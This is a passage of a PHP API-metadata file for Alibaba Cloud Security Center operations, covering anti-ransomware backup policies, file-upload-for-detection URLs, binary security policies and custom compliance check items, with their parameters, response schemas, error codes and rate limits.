'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"B44EA7F0-497A-5F10-B5A8-87291356****\\"\\n}","type":"json"}]', 'title' => 'CreateAttestor', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateAttestor'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateAttestor', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateBackupPolicy' => [ 'summary' => 'Creates an anti-ransomware policy for servers.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '91920', 'abilityTreeNodes' => ['FEATUREsas8YMQ5V'], ], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the anti-ransomware policy.'."\n", 'type' => 'string', 'required' => true, 'example' => 'ServerBackUpPolicy01', 'title' => ''], ], [ 'name' => 'Policy', 'in' => 'query', 'style' => 'json', 'schema' => ['description' => '* **IsDefault**: the type of the anti-ransomware policy. Valid values:'."\n" ."\n" .' * **1**: recommended policy'."\n" .' * **0**: custom policy'."\n" ."\n" .'* **Include**: the format of the files that you want to protect. If you want to protect the files in all formats, set this field to \\[].'."\n" ."\n" .'* **Source**: the directory that you want to protect. If you want to protect all directories, set this field to \\[].'."\n" ."\n" .'* **ExcludeSystemPath**: specifies whether to exclude a specific directory from the anti-ransomware policy. If you want to exclude a directory, set this field to **true**. If you do not want to exclude a directory, leave this field empty.'."\n" ."\n" .'* **Exclude**: the directory that you want to exclude from the anti-ransomware policy. If you do not want to exclude a directory, set this field to \\[].'."\n" ."\n" .'* **Schedule**: the start time and interval of a data backup task. We recommend that you specify a start time that begins during off-peak hours but does not start on the hour. Examples:'."\n" ."\n" .' * If you set this field to I|1583216092|P21D, the data backup task starts from 2020-03-03 14:14:52, and the task is run at an interval of three weeks.'."\n" .' * If you set this field to I|1583216092|PT24H, the data backup task starts from 2020-03-03 14:14:52, and the task is run at an interval of 24 hours.'."\n" ."\n" .'* **Retention**: the period during which backup data is retained. Unit: days. If you set this field to 7, backup data is retained for a week. If you set this field to 365, backup data is retained for a year. If you set this field to -1, backup data is permanently retained.'."\n" ."\n" .'* **SpeedLimiter**: the limit on the network bandwidth for data backup tasks. If you set this field to 0:24:30720, the maximum bandwidth for a data backup task is 30 MB/s from 00:00 to 24:00.'."\n" ."\n" .'* **UseVss**: specifies whether to enable the VSS feature. The feature is available only for Windows servers. Valid values:'."\n" ."\n" .' * **true**: yes'."\n" .' * **false**: no'."\n" ."\n" .'> The VSS feature is available only if you create the anti-ransomware policy for Windows servers. After you enable the feature, the number of backup failures due to running processes is significantly reduced. We recommend that you enable the VSS feature. After you enable the feature, the data of disks that are in the exFAT and FAT32 formats cannot be backed up.'."\n", 'type' => 'object', 'required' => true, 'example' => '"{"IsDefault":1,"Include":[],"Source":[],"Schedule":"I|1648061040|PT24H","Retention":7,"SpeedLimiter":"","ExcludeSystemPath":true,"Exclude":["/bin/","/usr/bin/","/sbin/","/boot/","/proc/","/sys/","/srv/","/lib/","/selinux/","/usr/sbin/","/run/","/lib32/","/lib64/","/lost+found/","/var/lib/kubelet/","/var/lib/ntp/proc","/var/lib/container","Windows","Python27","Program Files (x86)","Program Files","Boot","$RECYCLE.BIN","System Volume Information","Users\\Administrator\\NTUSER.DAT*","ProgramData","pagefile.sys","Users\\Default\\NTUSER.DAT*","Users\\Administrator\\ntuser.*"],"UseVss":true}"', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the anti-ransomware policy. Set the value to **2.0.0**.'."\n", 'type' => 'string', 'required' => true, 'example' => '2.0.0', 'title' => ''], ], [ 'name' => 'PolicyRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID of the server that is not deployed on Alibaba Cloud.'."\n" ."\n" .'> We recommend that you specify the ID of the supported region that is the nearest to the location of the server. You can call the [DescribeSupportRegion](~~DescribeSupportRegion~~) operation to query the supported regions of the anti-ransomware feature.'."\n", 'type' => 'string', 'required' => false, 'example' => 'ch-hangzhou', 'title' => ''], ], [ 'name' => 'UuidList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of the servers that you want to protect.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUIDs of the servers that you want to protect. Separate multiple UUIDs with commas (,).'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => '3bb30859-b3b5-4f28-868f-b0892c98****', 'title' => ''], 'required' => true, 'example' => '["3bb30859-b3b5-4f28-868f-b0892c98****", "3bb30859-b3b5-4f28-868f-b0892c98****"]', 'maxItems' => 1000, 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '24A20733-10A0-4AF6-BE6B-E3322413BB68', 'title' => ''], 'BackupPolicy' => [ 'description' => 'The information about the anti-ransomware policy.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The ID of the anti-ransomware policy.'."\n", 'type' => 'string', 'example' => '1301575', 'title' => ''], 'Status' => ['description' => 'The status of the anti-ransomware policy. Valid values:'."\n" ."\n" .'* **enabled**'."\n" .'* **disabled**'."\n" ."\n" .'> After you create an anti-ransomware policy, the policy is enabled by default.'."\n", 'type' => 'string', 'example' => 'enabled', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AgentNotOnline', 'errorMessage' => 'The agent not online.', 'description' => 'The error message returned because the Security Center agent is offline. Make sure that the Security Center agent is online and try again.'], ['errorCode' => 'AntiRansomwareCapacityUseUp', 'errorMessage' => 'anti ransomware capacity use up', 'description' => ''], ['errorCode' => 'DataExists', 'errorMessage' => 'data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"24A20733-10A0-4AF6-BE6B-E3322413BB68\\",\\n \\"BackupPolicy\\": {\\n \\"Id\\": \\"1301575\\",\\n \\"Status\\": \\"enabled\\"\\n }\\n}","errorExample":""},{"type":"xml","example":"\\n 24A20733-10A0-4AF6-BE6B-E3322413BB68\\n","errorExample":""}]', 'title' => 'CreateBackupPolicy', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateBackupPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateBackupPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'BackupPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:backuppolicy/*'], ], ], ], ], ], 'CreateBatchUploadUrl' => [ 'summary' => 'Queries the parameters that are required to upload a file for detection.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '119394', 'abilityTreeNodes' => ['FEATUREsasNPORLE'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Md5List', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The identifiers of files. Only MD5 hash values are supported.', 'type' => 'array', 'items' => ['description' => 'The identifiers of files. Only MD5 hash values are supported.', 'type' => 'string', 'required' => false, 'example' => 'a479262288e03f6a90dc282ea3******', 'title' => ''], 'required' => true, 'maxItems' => 1000, 'title' => '', 'example' => '', ], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the file. Valid values:'."\n" ."\n" .'* **0**: unknown file'."\n" .'* **1**: binary file'."\n" .'* **2**: webshell file'."\n" .'* **4**: script file'."\n" ."\n" .'> If you do not know the type of the file, set this parameter to **0**.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => 'DA62490B-7883-5EB4-8601-F2D1D9******'], 'UploadUrlList' => [ 'description' => 'An array consisting of the parameters that are required to upload a file.', 'type' => 'array', 'items' => [ 'description' => '', 'type' => 'object', 'properties' => [ 'PublicUrl' => ['description' => 'The public endpoint of the URL to which the file is uploaded.', 'type' => 'string', 'example' => 'http://example.com', 'title' => ''], 'InternalUrl' => ['description' => 'The internal endpoint of the URL to which the file is uploaded.', 'type' => 'string', 'example' => 'http://example.com', 'title' => ''], 'Expire' => ['description' => 'The timestamp when the values of the parameters expire. Unit: milliseconds.', 'type' => 'string', 'example' => '1658562101370', 'title' => ''], 'Context' => [ 'description' => 'The signature information.', 'type' => 'object', 'properties' => [ 'AccessId' => ['description' => 'The AccessKey ID that is used to access the OSS bucket.', 'type' => 'string', 'example' => 'yourAccessKeyID', 'title' => ''], 'Policy' => ['description' => 'The policy that poses limits on file upload. For example, the policy can limit the size of the file.', 'type' => 'string', 'example' => 'eyJleHBpcmF0aW9uIjoiMjAyMi0wNy0yM1QxMDo1ODoxMC****', 'title' => ''], 'Signature' => ['description' => 'The signature that is used to upload the file.', 'type' => 'string', 'example' => 'wDhPgVdnY/bkKFYcYFl+4crl****', 'title' => ''], 'OssKey' => ['description' => 'The key of the file that is used after the file is uploaded to the OSS bucket.', 'type' => 'string', 'example' => '1/2022/06/23/15/41/16559701077444693a0c6-33b2-4cc2-a99f-9f38b8b8****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'FileExist' => ['description' => 'Indicates whether the file exists in the cloud. Valid values:'."\n" ."\n" .'* **true**: The file exists in the cloud. You do not need to upload the file.'."\n" .'* **false**: The file does not exist in the cloud. You must upload the file.', 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'Md5' => ['description' => 'The identifier of the file.', 'type' => 'string', 'example' => '2f8dc248a0fbb96c69e45acad2******', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"DA62490B-7883-5EB4-8601-F2D1D9******\\",\\n \\"UploadUrlList\\": [\\n {\\n \\"PublicUrl\\": \\"http://example.com\\",\\n \\"InternalUrl\\": \\"http://example.com\\",\\n \\"Expire\\": \\"1658562101370\\",\\n \\"Context\\": {\\n \\"AccessId\\": \\"yourAccessKeyID\\",\\n \\"Policy\\": \\"eyJleHBpcmF0aW9uIjoiMjAyMi0wNy0yM1QxMDo1ODoxMC****\\",\\n \\"Signature\\": \\"wDhPgVdnY/bkKFYcYFl+4crl****\\",\\n \\"OssKey\\": \\"1/2022/06/23/15/41/16559701077444693a0c6-33b2-4cc2-a99f-9f38b8b8****\\"\\n },\\n \\"FileExist\\": false,\\n \\"Md5\\": \\"2f8dc248a0fbb96c69e45acad2******\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'CreateBatchUploadUrl', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '3000', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateBatchUploadUrl'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:CreateBatchUploadURL', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateBinarySecurityPolicy' => [ 'summary' => 'Creates a binary security policy.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '91921', 'abilityTreeNodes' => ['FEATUREsasJEFOWE'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address.'."\n", 'type' => 'string', 'required' => false, 'example' => '59.82.XXX.XXX', 'title' => ''], ], [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the policy.'."\n", 'type' => 'string', 'required' => false, 'example' => 'mv-test', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The description.'."\n", 'type' => 'string', 'required' => false, 'example' => 'remark test', 'title' => ''], ], [ 'name' => 'Policy', 'in' => 'query', 'schema' => ['description' => 'The content of the policy. Specify a value in the JSON format. You can specify the following keys:'."\n" ."\n" .'* **policyMode**: the type of the policy. Default value: requireAttestor.'."\n" .'* **requiredAttestors**: the required witnesses.'."\n", 'type' => 'string', 'required' => true, 'example' => '{\\"PolicyMode\\":\\"requireAttestor\\",\\"RequiredAttestors\\":[\\"test-xcs-04-12-heyuan\\"]}', 'title' => ''], ], [ 'name' => 'Clusters', 'in' => 'query', 'schema' => ['description' => 'The information about the cluster.'."\n", 'type' => 'string', 'required' => true, 'example' => '[{\\"ClusterId\\":\\"cc12429dbb8f644f690b0623fb52b4737\\",\\"Namespaces\\":[\\"default\\"]},{\\"ClusterId\\":\\"c9f5b93a8da8f4341b774d79fdbcedb3c\\",\\"Namespaces\\":[\\"default\\"]}]', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The status of the policy. Valid values:'."\n" ."\n" .'* **enable**'."\n" .'* **disable**'."\n", 'type' => 'string', 'required' => false, 'example' => 'enable', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '89AD16CC-97EE-50F3-9B12-9E28E5C8****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"89AD16CC-97EE-50F3-9B12-9E28E5C8****\\"\\n}","type":"json"}]', 'title' => 'CreateBinarySecurityPolicy', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateBinarySecurityPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateBinarySecurityPolicy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'CreateCheckItem' => [ 'summary' => 'User creates a custom check item', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'SectionIds', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Array of section IDs associated with the check item.', 'type' => 'array', 'items' => ['description' => 'Section ID associated with the check item.'."\n" .'> You can call the [ListCheckPolicies](~~ListCheckPolicies~~) API to get the check item ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1000000000001', 'title' => ''], 'required' => true, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'Cloud asset vendor.'."\n" .'> You can call the [ListCloudAssetSchemas](~~ListCloudAssetSchemas~~) API to get the available vendors.', 'type' => 'string', 'required' => true, 'example' => 'ALIYUN', 'title' => ''], ], [ 'name' => 'InstanceType', 'in' => 'query', 'schema' => ['description' => 'Asset type of the cloud product.'."\n" .'> You can call the [ListCloudAssetSchemas](~~ListCloudAssetSchemas~~) API to get this parameter.', 'type' => 'string', 'required' => true, 'example' => 'ECS', 'title' => ''], ], [ 'name' => 'InstanceSubType', 'in' => 'query', 'schema' => ['description' => 'Sub-asset type of the cloud product.'."\n" .'> You can call the [ListCloudAssetSchemas](~~ListCloudAssetSchemas~~) API to get this parameter.', 'type' => 'string', 'required' => true, 'example' => 'DISK', 'title' => ''], ], [ 'name' => 'CheckShowName', 'in' => 'query', 'schema' => ['description' => 'Name of the custom check item.', 'type' => 'string', 'required' => true, 'example' => 'testCheckItemName', 'title' => ''], ], [ 'name' => 'RiskLevel', 'in' => 'query', 'schema' => ['description' => 'Risk level of the check item. Values:'."\n" .'- **HIGH**: High risk'."\n" .'- **MEDIUM**: Medium risk'."\n" .'- **LOW**: Low risk', 'type' => 'string', 'required' => true, 'example' => 'LOW', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'Status of the check item. Values:'."\n" .'- **EDIT**: In editing'."\n" .'- **RELEASE**: Released'."\n" ."\n" .'> - Changing from **Released** to **In editing** will clear all historical records'."\n" .'> - Only the **Released** status allows the use of the check item for inspection.', 'type' => 'string', 'required' => true, 'enum' => ['RELEASE', 'EDIT'], 'example' => 'EDIT', 'title' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'Remark information.', 'type' => 'string', 'required' => false, 'example' => 'remark', 'title' => ''], ], [ 'name' => 'Description', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Description information of the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'Type of the check item description information. Values:'."\n" ."\n" .'- **text**: Text', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'Specific content of the description.', 'type' => 'string', 'required' => false, 'example' => 'custom description.', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'AssistInfo', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Help information for the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'Type of the help information for the check item risk. Values:'."\n" ."\n" .'- **text**: Text', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'Content of the help information for the check item risk.', 'type' => 'string', 'required' => false, 'example' => 'custom assistInfo.', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'Solution', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'Solution information for the check item.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'Type of the solution information for the check item. Values:'."\n" ."\n" .'- **text**: Text', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], 'Value' => ['description' => 'Content of the solution for the check item risk.', 'type' => 'string', 'required' => false, 'example' => 'text', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'CheckRule', 'in' => 'query', 'schema' => ['description' => 'Definition rule for the custom check item.', 'type' => 'string', 'required' => true, 'example' => '{"AssociatedData":{"ToDataList":[{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","FromPropertyPath":"InstanceId"}]},"MatchProperty":{"Operator":"AND","MatchProperties":[{"DataName":"ACS_ECS_Disk","PropertyPath":"InstanceId","MatchOperator":"EQ","MatchPropertyValue":"testId"},{"DataName":"ACS_ECS_Instance","PropertyPath":"InstanceId","MatchOperator":"EQ","MatchPropertyValue":"testInstanceId"}]}}', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Data structure returned by the interface.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'ID of the current request, which is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], 'Data' => [ 'description' => 'Data returned upon successful invocation.', 'type' => 'object', 'properties' => [ 'CheckId' => ['description' => 'The ID of the inspection item returned upon successful creation.', 'type' => 'integer', 'format' => 'int64', 'example' => '100000000001', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => 'Invalid parameter, please fill in again'], ['errorCode' => 'CspmParamOverSize', 'errorMessage' => 'The parameter is too long.', 'description' => 'The parameter is too long, please fill in again.'], ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => 'User has not purchased this product'], ['errorCode' => 'CspmCreateCheckCustomItemExceedLimit', 'errorMessage' => 'The number of custom check items created exceeds the limit.', 'description' => 'The number of custom check items created exceeds the limit.'], ['errorCode' => 'CspmCheckCustomItemSectionsError', 'errorMessage' => 'The chapter associated with the custom check item does not exist.', 'description' => 'The chapter associated with the custom check item does not exist.'], ['errorCode' => 'CspmVerifyItemRuleError.%s', 'errorMessage' => 'Audit check item check rule error: %s.', 'description' => 'The format of the check item rule does not pass. For details, see the return error code.'], ['errorCode' => 'CspmCreateCheckCustomItemError', 'errorMessage' => 'Failed to create custom check item.', 'description' => 'Failed to create custom check item.'], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Create Custom Check Item', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCheckItem'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateCheckItem', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckItem', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckitem/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\",\\n \\"Data\\": {\\n \\"CheckId\\": 100000000001\\n }\\n}","type":"json"}]', ], 'CreateCheckPolicy' => [ 'summary' => 'Create Policy', 'path' => '', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'PolicyType', 'in' => 'query', 'schema' => ['description' => 'The policy category type for custom check rules:'."\n" .'- **STANDARD**: Add to a standard.'."\n" .'- **REQUIREMENT**: Add to a requirement.'."\n" .'- **SECTION**: Add to a section.', 'type' => 'string', 'required' => true, 'example' => 'STANDARD', 'title' => ''], ], [ 'name' => 'PolicyShowName', 'in' => 'query', 'schema' => ['description' => 'The name of the custom policy.', 'type' => 'string', 'required' => true, 'example' => 'TestPolicyName', 'title' => ''], ], [ 'name' => 'DependentPolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the parent policy.'."\n" .' '."\n" .'(The specific dependency order from low to high is Section -> Requirement -> Standard)', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The name of the major policy category (required when PolicyType is STANDARD):'."\n" .'- **AISPM**: AI Configuration Management (AISPM).'."\n" .'- **IDENTITY_PERMISSION**: Identity and Permission Management (CIEM).'."\n" .'- **RISK**: Security Risk.'."\n" .'- **COMPLIANCE**: Compliance Risk.', 'type' => 'string', 'required' => false, 'example' => 'AISPM', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Information about the returned request.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F****'], 'CheckCustomPolicy' => [ 'description' => 'Specific information about the added policy.', 'type' => 'object', 'properties' => [ 'PolicyId' => ['description' => 'The ID of the custom policy.', 'type' => 'integer', 'format' => 'int64', 'example' => '1062**', 'title' => ''], 'PolicyType' => ['description' => 'The policy type for custom check rules:'."\n" .'- **STANDARD**: Standard policy type.'."\n" .'- **REQUIREMENT**: Requirement policy type.'."\n" .'- **SECTION**: Section policy type.', 'type' => 'string', 'example' => 'STANDARD', 'title' => ''], 'PolicyShowName' => ['description' => 'The name of the custom policy.', 'type' => 'string', 'example' => 'TestPolicyName', 'title' => ''], 'CheckType' => ['description' => 'The type of the policy (indicating whether it is a system or user-defined policy):'."\n" .'- **CUSTOM**: User-defined.'."\n" .'- **SYSTEM**: System-predefined.', 'type' => 'string', 'example' => 'CUSTOM', 'title' => ''], 'Type' => ['description' => 'The name of the associated major policy category:'."\n" .'- **AISPM**: AI Configuration Management (AISPM).'."\n" .'- **KISPM**: Kubernetes Configuration Management (KSPM).'."\n" .'- **IDENTITY_PERMISSION**: Identity and Permission Management (CIEM).'."\n" .'- **RISK**: Security Risk.'."\n" .'- **COMPLIANCE**: Compliance Risk.', 'type' => 'string', 'example' => 'AISPM', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPurchase', 'errorMessage' => 'The user did not purchase this product.', 'description' => 'User has not purchased this product'], ['errorCode' => 'CspmCreatePolicyExceedLimit', 'errorMessage' => 'The maximum number of created policies has been reached.', 'description' => 'The maximum number of created policies has been reached.'], ['errorCode' => 'CspmCreatePolicyExists', 'errorMessage' => 'Related policy %s already exist.', 'description' => 'Related policy% s already exists.'], ['errorCode' => 'CspmPolicyTypeNotExist', 'errorMessage' => 'The associated check criteria does not exist.', 'description' => 'The associated check criteria does not exist.'], ['errorCode' => 'CspmDependentPolicyError', 'errorMessage' => 'The associated policy %s is missing.', 'description' => 'The associated policy is missing. Reselect the policy configuration to be associated.'], ['errorCode' => 'CspmCreatePolicyError', 'errorMessage' => 'Failed to create policy.', 'description' => 'Failed to create policy, please try again.'], ['errorCode' => 'ParamIllegal.%s', 'errorMessage' => 'The parameter %s is invalid, please fill it in again.', 'description' => 'Invalid parameter, please fill in again'], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F****\\",\\n \\"CheckCustomPolicy\\": {\\n \\"PolicyId\\": 0,\\n \\"PolicyType\\": \\"STANDARD\\",\\n \\"PolicyShowName\\": \\"TestPolicyName\\",\\n \\"CheckType\\": \\"CUSTOM\\",\\n \\"Type\\": \\"AISPM\\"\\n }\\n}","type":"json"}]', 'title' => 'Create Custom Check Policy Category', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'CreateCheckPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:CreateCheckPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckStandardPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckstandardpolicy/*'], ], ], ], ], 'translator' => 'machine', ], 'CreateContainerScanTask' => [ 'summary' => 'Creates a container scan task.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'abilityTreeCode' => '149703', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], 'tenantRelevance' => 